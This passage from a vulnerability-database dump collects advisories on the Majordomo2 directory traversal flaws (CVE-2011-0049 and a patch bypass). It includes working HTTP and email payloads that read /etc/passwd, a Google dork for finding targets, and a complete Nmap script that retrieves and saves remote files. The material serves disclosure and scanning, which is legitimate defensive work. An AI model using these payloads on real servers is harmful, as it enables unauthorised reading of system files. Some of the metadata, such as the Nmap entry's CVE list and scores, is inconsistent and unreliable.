\n \n \n \nProof of Concept : \n================== \n \nHTTP: \nhttp://<target>/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help& \nextra=./..././..././..././..././..././..././..././.../etc/passwd \n \nSMTP: \nhelp ./..././..././..././..././..././..././..././.../etc/passwd \n \n \n \nSolution: \n========= \n \nUpdate to Majordomo2 >= 20110204 \n \nhttp://ftp.mj2.org/pub/mj2/snapshots/2011-02/majordomo-20110204.tar.gz \n \n \n \nReferences: \n=========== \n \nSitewatch Advisory: https://sitewat.ch/en/Advisory/View/1 \nOriginal Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=628064 \nPatch Bypass: https://bugzilla.mozilla.org/show_bug.cgi?id=631307 \n \n \n \nDisclosure Timeline (YYYY/MM/DD): \n================================= \n \n2011.02.03: Patch bypass vulnerability found \n2011.02.03: Informed security [at] mozilla.org \n2011.02.03: Mozilla opend Bug 631307 in bugzilla \n2011.02.03: Jason Tibbitts comitted a fix (Sorry again) \n2011.02.04: Snapshot available for download \n2011.02.04: Discuss the public disclosure \n2011.03.04: Got the Bug Bounty Money \n2011.03.08: Release of Advisory \n \n \n \n \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/99093/NSOADV-2011-003.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:24:55", "description": "", "published": "2011-02-02T00:00:00", "type": "packetstorm", "title": "Majordomo2 20110121 Directory Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0049"], "modified": "2011-02-02T00:00:00", "id": "PACKETSTORM:98116", "href": "https://packetstormsecurity.com/files/98116/Majordomo2-20110121-Directory-Traversal.html", "sourceData": "`Original Advisory: https://sitewat.ch/en/Advisory/View/1 \nCredit: Michael Brooks (https://sitewat.ch) \nVulnerability: Directory Traversal \nSoftware: Majordomo2 \nIdentifier:CVE-2011-0049 \nVendor: http://www.mj2.org/ \nAffected Build: 20110121 and prior \nDownload: 
\nhttp://ftp.mj2.org/pub/mj2/snapshots/2011-01/majordomo-20110121.tar.gz \nGoogle dork:inurl:mj_wwwusr \n \nSpecial thanks to Dave Miller, Reed Loden and the rest of the Mozilla \nsecurity team for handling the issue. \n \nThis vulnerability is exploitable via ALL of Majordomo2's interfaces. \n*Including \ne-mail*. Send an email to majordomo's mail interface (for example: \nmajordomo@bugzilla.org) with the body of the message as follows: \nhelp ../../../../../../../../../../../../../etc/passwd \n \nI'll give you one guess as to the contents of the response email ;). \n \nPoC for HTTP: \nhttp://localhost/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/98116/majordomo2-traverse.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:39", "description": "______________________________________________________________________\r\n-------------------------- NSOADV-2011-003 ---------------------------\r\n\r\n Majordomo2 'help' Command Directory Traversal (Patch Bypass)\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n 111101111\r\n 11111 00110 00110001111\r\n 111111 01 01 1 11111011111111\r\n 11111 0 11 01 0 11 1 1 111011001\r\n 11111111101 1 11 0110111 1 1111101111\r\n 1001 0 1 10 11 0 10 11 1111111 1 111 111001\r\n 111111111 0 10 1111 0 11 11 111111111 1 1101 10\r\n 00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100\r\n 10111111 0 01 0 1 1 111110 11 1111111111111 11110000011\r\n 0111111110 0110 1110 1 0 11101111111111111011 11100 00\r\n 01111 0 10 1110 1 011111 1 111111111111111111111101 01\r\n 01110 0 10 111110 110 0 11101111111111111111101111101\r\n 111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111\r\n 111110110 10 0111110 1 0 0 1111111111111111111111111 
110\r\n 111 11111 1 1 111 1 10011 101111111111011111111 0 1100\r\n 111 10 110 101011110010 11111111111111111111111 11 0011100\r\n 11 10 001100 0001 111111111111111111 10 11 11110\r\n 11110 00100 00001 10 1 1111 101010001 11111111\r\n 11101 0 1011 10000 00100 11100 00001101 0\r\n 0110 111011011 0110 10001 101 11110\r\n 1011 1 10 101 000001 01 00\r\n 1010 1 11001 1 1 101 10\r\n 110101011 0 101 11110\r\n 110000011\r\n 111\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n Title: Majordomo2 'help' Command Directory Traversal\r\n Severity: Medium\r\n Advisory ID: NSOADV-2011-003\r\n CVE: CVE-2011-0063\r\n Found Date: 03.02.2011\r\n Date Reported: 03.02.2011\r\n Release Date: 19.02.2011\r\n Author: Nikolas Sotiriu\r\n Mail: nso-research at sotiriu.de\r\n Website: http://sotiriu.de/\r\n Twitter: http://twitter.com/nsoresearch\r\n Advisory-URL: http://sotiriu.de/adv/NSOADV-2011-003.txt\r\n Vendor/Project: http://www.mj2.org/\r\n Affected Products: majordomo2 <= 20110203\r\n Remote Exploitable: Yes\r\n Local Exploitable: No\r\n Patch Status: Vendor released a patch (See Solution)\r\n Discovered by: Nikolas Sotiriu\r\n Disclosure Policy: http://sotiriu.de/policy.html\r\n Thanks to: Thierry Zoller: For the permission to use his\r\n Policy\r\n\r\n\r\n\r\nBackground:\r\n===========\r\n\r\nMajordomo 2 is an upwardly-compatible rewrite of the popular majordomo\r\nmailing list manager software by Jason Tibbitts and Michael Yount.\r\n\r\n\r\n\r\nDescription:\r\n============\r\n\r\nMajordomo2 <= 20110203 is affected by a Directory Traversal\r\nvulnerability due to parameter 'extra' of the 'help' command in the\r\nfunction '_list_file_get()' is not properly sanitized.\r\n\r\nThe original bug was made public on 03.02.2011 by Michael Brooks\r\nof sitewat.ch:\r\n\r\nhttps://sitewat.ch/en/Advisory/View/1\r\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=628064\r\n\r\nI discovered, that 
the patch, which has been in CVS since version 20110125,\r\ndoes not protect against the Directory Traversal bug.\r\n\r\nhttps://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481\r\n\r\nThe diff adds the regex '$file =~ s!/?\.\./?!!g;', which deletes\r\n'../' from $file. Bypassing this regex is quite simple by using './.../'\r\ninstead of '../': the substitution makes a single pass, so deleting the\r\ninner '/..' from './.../' leaves '../' behind.\r\n\r\n\r\n\r\nProof of Concept :\r\n==================\r\n\r\nHTTP:\r\nhttp://<target>/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&\r\nextra=./..././..././..././..././..././..././..././.../etc/passwd\r\n\r\nSMTP:\r\nhelp ./..././..././..././..././..././..././..././.../etc/passwd\r\n\r\n\r\n\r\nSolution:\r\n=========\r\n\r\nUpdate to Majordomo2 >= 20110204\r\n\r\nhttp://ftp.mj2.org/pub/mj2/snapshots/2011-02/majordomo-20110204.tar.gz\r\n\r\n\r\n\r\nReferences:\r\n===========\r\n\r\nSitewatch Advisory: https://sitewat.ch/en/Advisory/View/1\r\nOriginal Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=628064\r\nPatch Bypass: https://bugzilla.mozilla.org/show_bug.cgi?id=631307\r\n\r\n\r\n\r\nDisclosure Timeline (YYYY/MM/DD):\r\n=================================\r\n\r\n2011.02.03: Patch bypass vulnerability found\r\n2011.02.03: Informed security [at] mozilla.org\r\n2011.02.03: Mozilla opened Bug 631307 in bugzilla\r\n2011.02.03: Jason Tibbitts committed a fix (Sorry again)\r\n2011.02.04: Snapshot available for download\r\n2011.02.04: Discuss the public disclosure\r\n2011.03.04: Got the Bug Bounty Money\r\n2011.03.08: Release of Advisory\r\n\r\n\r\n\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2011-03-10T00:00:00", "title": "NSOADV-2011-003: Majordomo2 'help' Command Directory Traversal (Patch Bypass)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2011-0063"], "modified": "2011-03-10T00:00:00", "id": "SECURITYVULNS:DOC:25895", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25895", "cvss": {"score": 5.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:40", "bulletinFamily": "software", "cvelist": ["CVE-2011-0049"], "description": "Directory traversal on help command processing via e-mail or Web.", "edition": 1, "modified": "2011-03-10T00:00:00", "published": "2011-03-10T00:00:00", "id": "SECURITYVULNS:VULN:11397", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11397", "title": "Majordomo2 directory traversal", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:38", "bulletinFamily": "software", "cvelist": ["CVE-2011-0049"], "description": "Original Advisory: https://sitewat.ch/en/Advisory/View/1\r\nCredit: Michael Brooks (https://sitewat.ch)\r\nVulnerability: Directory Traversal\r\nSoftware: Majordomo2\r\nIdentifier:CVE-2011-0049\r\nVendor: http://www.mj2.org/\r\nAffected Build: 20110121 and prior\r\n \r\nSpecial thanks to Dave Miller, Reed Loden and the rest of the Mozilla security\r\nteam for handling the issue.\r\n \r\nThis vulnerability is exploitable via ALL of Majordomo2's interfaces. *Including\r\ne-mail*. 
Send an email to majordomo's mail interface (for example:\r\nmajordomo@bugzilla.org) with the body of the message as follows:\r\nhelp ../../../../../../../../../../../../../etc/passwd\r\n \r\nI'll give you one guess as to the contents of the response email ;).\r\n \r\nPoC for HTTP:\r\nhttp://localhost/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd", "edition": 1, "modified": "2011-02-03T00:00:00", "published": "2011-02-03T00:00:00", "id": "SECURITYVULNS:DOC:25607", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25607", "title": "Majordomo2 - Directory Traversal (SMTP/HTTP)", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cert": [{"lastseen": "2021-09-28T17:50:57", "description": "### Overview\n\nMajordomo 2 contains a directory traversal vulnerability in the `_list_file_get()`function, which may allow a remote, unauthenticated attacker to obtain sensitive information.\n\n### Description\n\nMajordomo 2 contains a directory traversal vulnerability in the `_list_file_get()`function (lib/Majordomo.pm) caused by an input validation error when handling files. An attacker can exploit this vulnerability via directory traversal specifiers sent in a specially crafted request to any of the application's interfaces (e.g. email or web). \n\n\nAdditional information regarding this vulnerability can be found in this [Sitewatch Advisory](<https://sitewat.ch/en/Advisory/View/1>). \n \n--- \n \n### Impact\n\nA remote unauthenticated attacker could obtain sensitive information. \n \n--- \n \n### Solution\n\n**Update** \nMajordomo 2 recommends users update to snapshot [20110204](<http://ftp.mj2.org/pub/mj2/snapshots/2011-02/majordomo-20110204.tar.gz>) or later. \n \n--- \n \n### Vendor Information\n\nThe vulnerability is reported in snapshots prior to 20110204. 
\n \n--- \n \n363726\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Majordomo 2 Affected\n\nUpdated: February 04, 2011 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://ftp.mj2.org/pub/mj2/snapshots/2011-02/>\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References\n\n * <http://www.us-cert.gov/current/index.html#majordomo_vulnerable_to_directory_traversal>\n * <https://sitewat.ch/en/Advisory/View/1>\n * <http://ftp.mj2.org/pub/mj2/snapshots/2011-02/>\n\n### Acknowledgements\n\nThis vulnerability was reported by Michael Brooks.\n\nThis document was written by Michael Orlando.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2011-0049](<http://web.nvd.nist.gov/vuln/detail/CVE-2011-0049>) \n---|--- \n**Severity Metric:** | 25.20 \n**Date Public:** | 2011-02-04 \n**Date First Published:** | 2011-02-04 \n**Date Last Updated: ** | 2011-03-28 12:27 UTC \n**Document Revision: ** | 22 \n", "cvss3": {}, "published": "2011-02-04T00:00:00", "type": "cert", "title": "Majordomo 2 _list_file_get() directory traversal vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2011-0049"], "modified": "2011-03-28T12:27:00", "id": "VU:363726", "href": "https://www.kb.cert.org/vuls/id/363726", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2017-11-19T13:36:24", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Majordomo2 - Directory Traversal (SMTP/HTTP)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0049"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70661", "id": "SSV:70661", "sourceData": "\n Original Advisory: https://sitewat.ch/en/Advisory/View/1\r\nCredit: Michael Brooks (https://sitewat.ch)\r\nVulnerability: Directory Traversal\r\nSoftware: Majordomo2\r\nIdentifier:CVE-2011-0049\r\nVendor: http://www.mj2.org/\r\nAffected Build: 20110121 and prior\r\nGoogle dork:inurl:mj_wwwusr\r\n\r\nSpecial thanks to Dave Miller, Reed Loden and the rest of the Mozilla\r\nsecurity team for handling the issue.\r\n\r\nThis vulnerability is exploitable via ALL of Majordomo2's interfaces.\r\n*Including\r\ne-mail*. 
Send an email to majordomo's mail interface (for example:\r\nmajordomo@bugzilla.org) with the body of the message as follows:\r\nhelp ../../../../../../../../../../../../../etc/passwd\r\n\r\nI'll give you one guess as to the contents of the response email ;).\r\n\r\nPoC for HTTP:\r\nhttp://localhost/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-70661"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:30", "description": "\nMajordomo2 - SMTPHTTP Directory Traversal", "edition": 2, "published": "2011-02-03T00:00:00", "title": "Majordomo2 - SMTPHTTP Directory Traversal", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0049"], "modified": "2011-02-03T00:00:00", "id": "EXPLOITPACK:ADF3F1E022806BE8557129BCD419E365", "href": "", "sourceData": "Original Advisory: https://sitewat.ch/en/Advisory/View/1\nCredit: Michael Brooks (https://sitewat.ch)\nVulnerability: Directory Traversal\nSoftware: Majordomo2\nIdentifier:CVE-2011-0049\nVendor: http://www.mj2.org/\nAffected Build: 20110121 and prior\nGoogle dork:inurl:mj_wwwusr\n\nSpecial thanks to Dave Miller, Reed Loden and the rest of the Mozilla\nsecurity team for handling the issue.\n\nThis vulnerability is exploitable via ALL of Majordomo2's interfaces.\n*Including\ne-mail*. 
Send an email to majordomo's mail interface (for example:\nmajordomo@bugzilla.org) with the body of the message as follows:\nhelp ../../../../../../../../../../../../../etc/passwd\n\nI'll give you one guess as to the contents of the response email ;).\n\nPoC for HTTP:\nhttp://localhost/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2022-08-16T09:13:17", "description": "", "cvss3": {}, "published": "2011-02-03T00:00:00", "type": "exploitdb", "title": "Majordomo2 - 'SMTP/HTTP' Directory Traversal", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["2011-0049", "2011-0063", "CVE-2011-0049"], "modified": "2011-02-03T00:00:00", "id": "EDB-ID:16103", "href": "https://www.exploit-db.com/exploits/16103", "sourceData": "Original Advisory: https://sitewat.ch/en/Advisory/View/1\r\nCredit: Michael Brooks (https://sitewat.ch)\r\nVulnerability: Directory Traversal\r\nSoftware: Majordomo2\r\nIdentifier:CVE-2011-0049\r\nVendor: http://www.mj2.org/\r\nAffected Build: 20110121 and prior\r\nGoogle dork:inurl:mj_wwwusr\r\n\r\nSpecial thanks to Dave Miller, Reed Loden and the rest of the Mozilla\r\nsecurity team for handling the issue.\r\n\r\nThis vulnerability is exploitable via ALL of Majordomo2's interfaces.\r\n*Including\r\ne-mail*. 
Send an email to majordomo's mail interface (for example:\r\nmajordomo@bugzilla.org) with the body of the message as follows:\r\nhelp ../../../../../../../../../../../../../etc/passwd\r\n\r\nI'll give you one guess as to the contents of the response email ;).\r\n\r\nPoC for HTTP:\r\nhttp://localhost/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd", "sourceHref": "https://www.exploit-db.com/download/16103", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nmap": [{"lastseen": "2022-02-15T21:43:25", "description": "Exploits a directory traversal vulnerability existing in Majordomo2 to retrieve remote files. (CVE-2011-0049). \n\nVulnerability originally discovered by Michael Brooks. \n\nFor more information about this vulnerability: \n\n * <http://www.mj2.org/>\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0049>\n * <http://www.exploit-db.com/exploits/16103/>\n\n## Script Arguments \n\n#### http-majordomo2-dir-traversal.rfile \n\nRemote file to download. Default: /etc/passwd\n\n#### http-majordomo2-dir-traversal.uri \n\nURI Path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr\n\n#### http-majordomo2-dir-traversal.outfile \n\nIf set it saves the remote file to this location. \n\nOther arguments you might want to use with this script: \n\n * http.useragent - Sets user agent\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap -p80 --script http-majordomo2-dir-traversal <host/ip>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 80/tcp open http syn-ack\n | http-majordomo2-dir-traversal: /etc/passwd was found:\n |\n | root:x:0:0:root:/root:/bin/bash\n | bin:x:1:1:bin:/bin:/sbin/nologin\n |\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [io](<>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-06-27T20:22:25", "type": "nmap", "title": "http-majordomo2-dir-traversal NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0049", "CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:HTTP-MAJORDOMO2-DIR-TRAVERSAL.NSE", "href": "https://nmap.org/nsedoc/scripts/http-majordomo2-dir-traversal.html", "sourceData": "local http = require \"http\"\nlocal io = require \"io\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = 
[[\nExploits a directory traversal vulnerability existing in Majordomo2 to retrieve remote files. (CVE-2011-0049).\n\nVulnerability originally discovered by Michael Brooks.\n\nFor more information about this vulnerability:\n* http://www.mj2.org/\n* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0049\n* http://www.exploit-db.com/exploits/16103/\n]]\n\n---\n-- @usage\n-- nmap -p80 --script http-majordomo2-dir-traversal <host/ip>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 80/tcp open http syn-ack\n-- | http-majordomo2-dir-traversal: /etc/passwd was found:\n-- |\n-- | root:x:0:0:root:/root:/bin/bash\n-- | bin:x:1:1:bin:/bin:/sbin/nologin\n-- |\n--\n-- @args http-majordomo2-dir-traversal.rfile Remote file to download. Default: /etc/passwd\n-- @args http-majordomo2-dir-traversal.uri URI Path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr\n-- @args http-majordomo2-dir-traversal.outfile If set it saves the remote file to this location.\n--\n-- Other arguments you might want to use with this script:\n-- * http.useragent - Sets user agent\n--\n\nauthor = \"Paulino Calderon <calderon@websec.mx>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"vuln\", \"exploit\"}\n\n\nportrule = shortport.http\n\nlocal MAJORDOMO2_EXPLOIT_QRY = \"?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../..\"\nlocal MAJORDOMO2_EXPLOIT_URI = \"/cgi-bin/mj_wwwusr\"\nlocal DEFAULT_REMOTE_FILE = \"/etc/passwd\"\n\n---\n--Writes string to file\n--Taken from: hostmap.nse\nlocal function write_file(filename, contents)\n local f, err = io.open(filename, \"w\")\n if not f then\n return f, err\n end\n f:write(contents)\n f:close()\n return true\nend\n\n---\n-- MAIN\n---\naction = function(host, port)\n local response, rfile, rpath, uri, evil_uri, rfile_content, filewrite\n local output_lines = {}\n\n filewrite = stdnse.get_script_args(\"http-majordomo2-dir-traversal.outfile\")\n uri = 
stdnse.get_script_args(\"http-majordomo2-dir-traversal.uri\") or MAJORDOMO2_EXPLOIT_URI\n rfile = stdnse.get_script_args(\"http-majordomo2-dir-traversal.rfile\") or DEFAULT_REMOTE_FILE\n evil_uri = uri..MAJORDOMO2_EXPLOIT_QRY..rfile\n\n stdnse.debug1(\"HTTP GET %s%s\", stdnse.get_hostname(host), evil_uri)\n response = http.get(host, port, evil_uri)\n if response.body and response.status==200 then\n if response.body:match(\"unknowntopic\") then\n stdnse.debug1(\"[Error] The server is not vulnerable, '%s' was not found or the web server has insufficient permissions to read it\", rfile)\n return\n end\n local _\n _, _, rfile_content = string.find(response.body, '<pre>(.*)<!%-%- Majordomo help_foot format file %-%->')\n output_lines[#output_lines+1] = rfile..\" was found:\\n\"..rfile_content\n if filewrite then\n local status, err = write_file(filewrite, rfile_content)\n if status then\n output_lines[#output_lines+1] = string.format(\"%s saved to %s\\n\", rfile, filewrite)\n else\n output_lines[#output_lines+1] = string.format(\"Error saving %s to %s: %s\\n\", rfile, filewrite, err)\n end\n end\n return table.concat(output_lines, \"\\n\")\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}